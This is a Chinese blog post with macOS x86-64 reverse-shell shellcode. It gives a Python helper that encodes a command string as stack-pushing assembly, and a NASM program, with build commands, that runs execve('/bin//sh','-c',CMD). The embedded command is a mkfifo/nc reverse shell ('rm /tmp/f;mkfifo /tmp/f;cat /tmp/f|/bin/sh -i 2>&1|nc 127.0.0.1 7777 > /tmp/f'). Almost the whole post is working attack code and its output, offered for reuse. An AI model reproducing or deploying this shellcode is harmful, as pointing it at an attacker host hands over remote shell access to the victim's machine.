版权声明:随意转载,需注明出处。by think_ycx https://blog.csdn.net/think_ycx/article/details/84974956
shellcode功能:获取execve系统的调用,执行execve("/bin//sh\x00","-c",CMD),其中CMD是我们需要执行的命令,shellcode中我把CMD push到栈上。由于一开始汇编时遇到注释相关的问题,我就把注释删了,lldb或gdb调试再结合参考文章看一下就比较清楚了。
最新版本放在这里:
- https://gist.github.com/thinkycx/4cd3c90804b7e2366d49bf06d0cbb385
- https://gist.github.com/thinkycx/66b9b1d02a514a4b72daef6569ee6c71
生成push字符串的汇编如下:
#!/usr/bin/python
# date: 2018-12-11
# author: thinkycx
# description: return asm shellcode : push string into stack and esp points to it!
# usage:
# change payload and run it.
import math
def pushstr(string='/home/orw/flag',length=8):
'''
return asm shellcode : push string into stack and esp points to it!
'''
print 'pushasm: '+string
string = string[::-1]
pushstr = ''
times = int(math.ceil(float(len(string))/length))
startpos = 0
for i in range(1,times+1):
ilen = (len(string) - (times-i)*length)
ilen = ilen if ilen < length else length
istring = string[startpos:startpos+ilen].encode('hex')
pushstr += 'mov rcx, 0x%s\npush rcx\n' % istring
#pushstr += 'push 0x%s;' % istring
# print 'start '+str(startpos)+' end '+str(startpos+ilen)
startpos += ilen
print pushstr
# log.info("/home/orw/flag\x00".encode('hex'))
return pushstr
payload = 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f'
pushstr(payload)
'''
Output:
pushasm: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 127.0.0.1 7777 > /tmp/f
mov rcx, 0x662f706d74
push rcx
mov rcx, 0x2f203e2037373737
push rcx
mov rcx, 0x20312e302e302e37
push rcx
mov rcx, 0x323120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
'''shellcode:
; date: 2018-12-11
; author: thinkycx
; description:
; reverse /bin/sh by nc, reference: https://modexp.wordpress.com/2017/01/21/shellcode-osx/
; usage:
; nasm -f macho64 macOS-reverse-shellcode.asm
; ld -macosx_version_min 10.7.0 -o macOS-reverse-shellcode macOS-reverse-shellcode.o
BITS 64
global start
section .text
start:
xor rax, rax
mov rax,0x2
ror rax, 0x28
or rax, 59
mov rcx, rax
xor rdx, rdx
mov rbx, 0x68732f2f6e69622f
push rdx
push rbx
push rsp
pop rdi
push rdx
mov rbx, 0x632d
push rdx
push rbx
push rsp
pop rbx
push rdx
mov rcx, 0x662f706d74
push rcx
mov rcx, 0x2f203e2037373737
push rcx
mov rcx, 0x20312e302e302e37
push rcx
mov rcx, 0x323120636e7c3126
push rcx
mov rcx, 0x3e3220692d206873
push rcx
mov rcx, 0x2f6e69622f7c662f
push rcx
mov rcx, 0x706d742f20746163
push rcx
mov rcx, 0x3b662f706d742f20
push rcx
mov rcx, 0x6f6669666b6d3b66
push rcx
mov rcx, 0x2f706d742f206d72
push rcx
push rsp
pop rcx
push rdx
push rcx
push rbx
push rdi
push rsp
pop rsi
syscall